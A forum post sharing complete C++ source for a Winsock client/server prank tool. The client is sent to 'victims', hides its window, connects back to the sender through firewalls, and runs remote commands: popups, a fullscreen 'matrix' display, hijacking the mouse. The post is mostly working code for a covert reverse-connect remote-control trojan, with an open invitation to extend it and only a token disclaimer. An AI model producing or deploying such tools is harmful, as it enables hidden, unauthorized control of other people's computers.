Architecture: N/a
Description:
I was digging through my old programs on my ancient machine and ran across a VERY old program i made. It is VERY messy, and very dirty coding but it gets the job done, i also observed it is possible to exploit a buffer overflow.
Here it is, feel free to modify tweak and fine tune it to your advantage.
The way it works is there is a client and a server (Both codes below). I initially made this program to send to my friends and execute harmless code for a laugh because i had just learned winsock. The client connects to the server. However unlike traditional remote tools, it is the SERVER that is executing commands on the CLIENT pc. This is done so that even if the 'victim' had a firewall/router they would be connecting to ME and a connection is always guaranteed. In short, you will be 'hosting' a server on your PC that will wait for anyone to open the client exe. When opened it will inform you that a connection has made and will wait for an input ( Command line ).
For FURTHER clarification, you will be making 2 exe's. One that you run, one that you send your friends.
It should be noted that
- Code: Select all
wsock32.lib
Disclaimer: You know what im going to say. Im not responsible for your stupidity. I'm here to teach the concept of windows sockets and over-the-wire communication, not Trojan building.
Server code(You will be running this exe)
- Code: Select all
#include <windows.h> //Required for socket init
#include <iostream>
using namespace std;
int main(){
std::cout<<"----Server command console----\n";
std::cout<<"__Grim\n";
char buf[200];
WSAData wsdata; //Declare WSAData
WORD wsver=MAKEWORD(2, 0); //We want Winsock 2.0
int nret=WSAStartup(wsver, &wsdata); //Pass version 2.0 and pointer to implement
if(nret != 0){ //Init failed
/*A successful return value should be 0 */
std::cout<<"Startup failed, error code: "<<WSAGetLastError(); //Returns error code
WSACleanup(); //Cleanup Winsock library
return -1;
}
std::cout<<"Init success\n";
SOCKET kSock=socket(AF_INET, SOCK_STREAM, 0);
if(kSock == INVALID_SOCKET){
std::cout<<"Socket init failed";
return -1;
}
std::cout<<"Socket initialized\n";
sockaddr_in sin;
sin.sin_port=htons(1337); // This is the port you are listening to. Make sure it matches in the client as well.
sin.sin_addr.s_addr=INADDR_ANY; // This means any ip can connect to you. You can tweak it , but i see no point.
sin.sin_family=AF_INET;
if(bind(kSock,(sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR){
std::cout<<"Failed to bind\n";
WSACleanup(); //Cleanup Winsock library
return -1;
}
std::cout<<"Bind successful!\n";
CON:
std::cout<<"Now waiting for target connection...\n";
while (listen(kSock, SOMAXCONN) == SOCKET_ERROR); //Loop in order to constantly listen
// Anything from this point on, assumes someone has connected
SOCKET client; // Your first socket.
int len = sizeof(sin);
client=accept(kSock, (sockaddr*)&sin, &len); //Accepting the connection.
std::cout<<"Connection established!\n";
//Set a label called CMD
CMD:
// ************** This is where your program will start visually to you ***************
std::cout<<"_Command >: "; //I dont know why i used std:: since its already in the std namespace, but just to be safe ill leave it here.
std::cin.getline(buf,sizeof(buf)); //The buffer was declared all the way at the top and is 200 chars. Feel free to reduce it, thats what i would do.
//Compare the buffer to a hard-coded list of commands. This will make more sense when you read the command list at the end of this forum post.
if(strcmp(buf,"pop")==0){
send(client, buf, sizeof(buf), 0); //Send it over the wire to the client. ( All it is sending is the contents of the buffer .. or the word 'pop' )
std::cout<<"_Sub Command >: "; //This specific command expects a sub command
std::cin.getline(buf,sizeof(buf));
send(client, buf, sizeof(buf), 0); //Send
goto CMD; //Go back up so we can send another command.
}
if(strcmp(buf,"end")==0){
send(client, buf, sizeof(buf), 0); //Send
std::cout<<" Client Connection closed.\n";
std::cout<<" Cient Process terminated.\n";
std::cout<<" Now Re-initilizing...\n";
goto CON; //Goes back up to the CON label to reinit.
}
if(strcmp(buf,"exit")==0){
send(client, "end", 3, 0); //Send
closesocket(client); //Close both socket handles
closesocket(kSock);
WSACleanup();
exit(0);
}
else{
//The above are the only exceptions where something needs to be done before it is sent to the client. So if it is another command ,just send it over the wire and go back to send another command.
send(client, buf, sizeof(buf), 0); //Send
goto CMD;
}
return 0;
}
Simple enough, Compile it.
Now the harder part.
Client code(You will be sending this exe to friends)
- Code: Select all
#undef _WIN32_WINNT //For hiding/showing window
#define _WIN32_WINNT 0x0500
#include <windows.h> //Required for socket init
#include <iostream>
#include <stdlib.h>
#include <windows.h>
#include <iomanip>
#include <stdio.h>
#include <conio.h>
#include <fstream>
using namespace std;
//function declaration prototypes
void crazyMouse(BOOL cmProc);
void Matrix(BOOL pwnProc);
char procCmd(char buff[200], SOCKET * fSocket);
void PoP(char message[200]);
// static variables (Dont know why i did this)
static BOOL pwnProc = false;
static BOOL pop = false;
//pointer to socket
SOCKET * pSock;
//for matrix
HWND hWnd = GetConsoleWindow();
int main(){
// First thing we want to do is make sure that our console is in-fucking-visible
ShowWindow( hWnd, SW_HIDE );
//Begin winsock chunk
char buf[256];
WSAData wsdata;
WORD wsver=MAKEWORD(2, 0); //We want Winsock 2.0
int nret=WSAStartup(wsver, &wsdata); //Pass version 2.0 and pointer to implement
if(nret != 0){ //Init failed
/*A successful return value should be 0 */
std::cout<<"Startup failed, error code: "<<WSAGetLastError(); //Returns error code
WSACleanup(); //Cleanup Winsock library
return -1;
}
std::cout<<"Init success\n";
SOCKET kSock=socket(AF_INET, SOCK_STREAM, 0);
if(kSock == INVALID_SOCKET){
std::cout<<"Socket init failed";
return -1;
}
std::cout<<"Socket initialized\n";
sockaddr_in sin;
//****PORT HERE****
sin.sin_port=htons(1337); //Connect to port 1337
//****PORT HERE****
//
////////////***************IP HERE////////////***************
sin.sin_addr.s_addr=inet_addr("172.16.3.161"); //Connect to this ip (Should be your ip, so the victim connects to you )
////////////***************IP HERE////////////***************
//
sin.sin_family=AF_INET;
if(connect(kSock,(sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR){ //Check the condition
std::cout<<"Connect failed, error: "<<WSAGetLastError(); //Returns error code
WSACleanup(); //Cleanup the library
return -1;
}
std::cout<<"Connection successful!\n";
//***************************************************
// ^^^^^^^^^^^^ The program will always come back here to re-receive and re-compare commands.
pSock = &kSock;
// |
// v
//Back down
REC:
while (recv(kSock, buf, sizeof(buf), 0)){ //while the command is received
procCmd(buf,pSock); //push the received command into the procCmd function to be compared with a command list
}
//Back up
goto REC;
//^
//|
return 0;
}
//***************************************************
/////////////// BEGIN COMMAND LIST /////////////////
//the procCmd fucntion means ProcessCommand and is responsible for handling commands.
// If you are going to add new commands to this program you should start here.
char procCmd(char buff[200], SOCKET* fSocket){
// needs to be reinit'd cuz of cross function
SOCKET kSock = *fSocket;
/* This is where the magic happens, the received commands are compared to a hard coded list of commands. If it recognizes a command, it is sent to the appropriate function (or just executed if the code is small). I initially added in character return values so i could resend them back to the server (me) to verify if a command was executed or not. I never got around to it , maybe you can?*/
if (pop == true){ /*Pop is a special command because it displays a message box on the users screen. So the command pop would first need to written, which would make pop==true. Once it's true, it will be expecteing another sub-command for the actual contents of the messagebox, this is why the server-side code needed to deal with the pop command, so that it could prompt the user to input a sub command, i dont know why i did it this way.*/
PoP(buff);
pop = false;
return '1';
}
if (strcmp(buff,"pop")==0){
pop = true;
return '1';
}
if (strcmp(buff,"end")==0){
closesocket(kSock);
exit(0);
}
if (strcmp(buff,"-")==0){
ShowWindow( hWnd, SW_HIDE );
return '1';
}
if (strcmp(buff,"+")==0){
ShowWindow( hWnd, SW_SHOW );
return '1';
}
if (strcmp(buff,"pwn")==0){
Matrix(true);
return '1';
}
if (strcmp(buff,"unpwn")==0){
Matrix(false);
//clean up
ShowWindow( hWnd, SW_HIDE );
return '1';
}
if (strcmp(buff,"crazymouse")==0){
crazyMouse(true);
return '1';
}
if (strcmp(buff,"uncrazy")==0){ //not working
crazyMouse(false);
return '1';
}
return '0';
}
/////////////// BEGIN EXECUTABLE FUNCTIONS ////////////////////////////
// Pop up message - Grim
void PoP(char message[200]){
MessageBox(NULL,message,NULL,NULL);
}
/* this thing is really cute, it puts the dialog box into full screen and displays a bunch of green random texts like the matrix. If you want to stop it manually just press alt+enter to get out of fullscreen then close it.*/
// Matrix , total annhilation - Grim
void Matrix(BOOL pwnProc){
if (pwnProc==true) {
// make sure its visible
ShowWindow( hWnd, SW_SHOW );
keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
START:
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}
}
//Crazy mouse - Grim
void crazyMouse(BOOL cmProc){
if(cmProc==true){
do{
Sleep(900);
int x = rand()%1000;
int y = rand()%700;
SetCursorPos(x, y);
}
while (cmProc==true);
}
}
There are bugs, but PLEASE be sure to read annotations/comments before using this code!
Here is a list of commands already coded (not many)
- Code: Select all
Command list:
pop = Display a message box on the remote clients screen.
end = End current connection with remote client and wait for another one.
exit = End current connection with remote client and exit.
pwn = Scare the shit out of the remote client with a full screen matrix style text flow.
unpwn = Stop the crazyness of the matrix. ** DOES NOT WORK!!! ***
crazymouse = The client loses all control of his mouse and it randomly moves around the screen.
uncrazy = Undoes the effect of crazy mouse ** DOES NOT WORK!!! **
+ = Shows the program window on the remote clients screen
- = Hides window on the remote clients screen.
You can add your own functions, but be sure you understand how the flow of the program works, because i didn't use classes and it is dirty as hell.
It should be noted that if you want YOUR prompt (the server) to do something before the command is sent over the wire, you should follow my syntax in the code.
Enjoy.
- Grimsoul
*Edit: The ip included in this post is not mine, feel free to do whatever you want to it.
